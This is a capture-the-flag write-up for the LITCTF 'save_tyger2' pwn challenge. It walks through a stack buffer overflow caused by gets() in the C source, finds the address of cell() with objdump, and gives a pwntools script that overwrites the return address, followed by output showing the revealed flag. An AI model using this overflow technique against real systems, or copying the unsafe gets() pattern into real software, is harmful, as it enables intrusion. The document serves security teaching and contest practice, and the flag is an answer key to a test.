Tags: buffer overflow 

Rating: 5.0

Downloading the zip file and extracting it, we find the executable and the C source.
First, let's look at the C source for an idea of what it does:
```c
#include <stdlib.h>
#include <stdio.h>

void cell(){
printf("Thank god you got him out of this cockroach-infested cell!\n");
FILE *f = fopen("flag.txt", "r");
char flag[64];
if(f == NULL){
printf("Something went wrong. Please let Eggag know.\n");
exit(1);
}
fgets(flag, 64, f);
puts(flag);
exit(0);
}

int main(){
char buf[32];
printf("NOOOO, THEY TOOK HIM AGAIN!\n");
printf("Please help us get him out or there is no way we will be able to prepare LIT :sadness:\n");
gets(buf);
}
```
Now it looks like that we're printing out some stuff then taking some input into `buf`, then exiting. We need to go to the `cell` function to get the flag though. But notice that we're using `gets` and `gets` is vulnerable to buffer overflows. So we can just overwrite the return address with the address of `cell`!

Now let's try to construct the payload. We need 32 bytes of padding obviously to fill up the buffer. After that, we have the saved `rbp`, which is `8` bytes, because this is an `x86_64` program, which you can confirm by disassembling it with `objdump` and seeing that it uses `64` bit registers. Finally, we need the address of `cell` as a 64 bit integer.

Now to find the address of `cell`, we need to disassemble the program, which we can do with `objdump -D ./save_tyger2`:
```assembly
...
0000000000401162 <cell>:
401162: 55 push %rbp
401163: 48 89 e5 mov %rsp,%rbp
401166: 48 83 ec 50 sub $0x50,%rsp
40116a: bf 08 20 40 00 mov $0x402008,%edi
40116f: e8 bc fe ff ff callq 401030 <puts@plt>
401174: be 43 20 40 00 mov $0x402043,%esi
401179: bf 45 20 40 00 mov $0x402045,%edi
40117e: e8 dd fe ff ff callq 401060 <fopen@plt>
401183: 48 89 45 f8 mov %rax,-0x8(%rbp)
401187: 48 83 7d f8 00 cmpq $0x0,-0x8(%rbp)
40118c: 75 14 jne 4011a2 <cell+0x40>
40118e: bf 50 20 40 00 mov $0x402050,%edi
401193: e8 98 fe ff ff callq 401030 <puts@plt>
401198: bf 01 00 00 00 mov $0x1,%edi
40119d: e8 ce fe ff ff callq 401070 <exit@plt>
4011a2: 48 8b 55 f8 mov -0x8(%rbp),%rdx
4011a6: 48 8d 45 b0 lea -0x50(%rbp),%rax
4011aa: be 40 00 00 00 mov $0x40,%esi
4011af: 48 89 c7 mov %rax,%rdi
4011b2: e8 89 fe ff ff callq 401040 <fgets@plt>
4011b7: 48 8d 45 b0 lea -0x50(%rbp),%rax
4011bb: 48 89 c7 mov %rax,%rdi
4011be: e8 6d fe ff ff callq 401030 <puts@plt>
4011c3: bf 00 00 00 00 mov $0x0,%edi
4011c8: e8 a3 fe ff ff callq 401070 <exit@plt>
...
```
(to intel assembly fans: there's no need here since we just need the address)

So the address is `0x0000000000401162`. Compiling this information into a solve script, we have:
```python3
from pwn import *
s = b'a' * 40 # 32 + 8 = 40
s += p64(0x401162)
r = remote('litctf.live', 31788)
print(r.recvuntil(b':sadness:\n'))
print('Sending data')
r.sendline(s)
print(r.interactive())
```
Running, we get the output:
```
[+] Opening connection to litctf.live on port 31788: Done
b'NOOOO, THEY TOOK HIM AGAIN!\nPlease help us get him out or there is no way we will be able to prepare LIT :sadness:\n'
Sending data
[*] Switching to interactive mode
Thank god you got him out of this cockroach-infested cell!
LITCTF{w3_w0nt_l3t_th3m_t4k3_tyg3r_3v3r_4gain}

[*] Got EOF while reading in interactive
$
```
We have the flag! It's `LITCTF{w3_w0nt_l3t_th3m_t4k3_tyg3r_3v3r_4gain}`. (Hopefully CodeTiger will learn pwn next time.)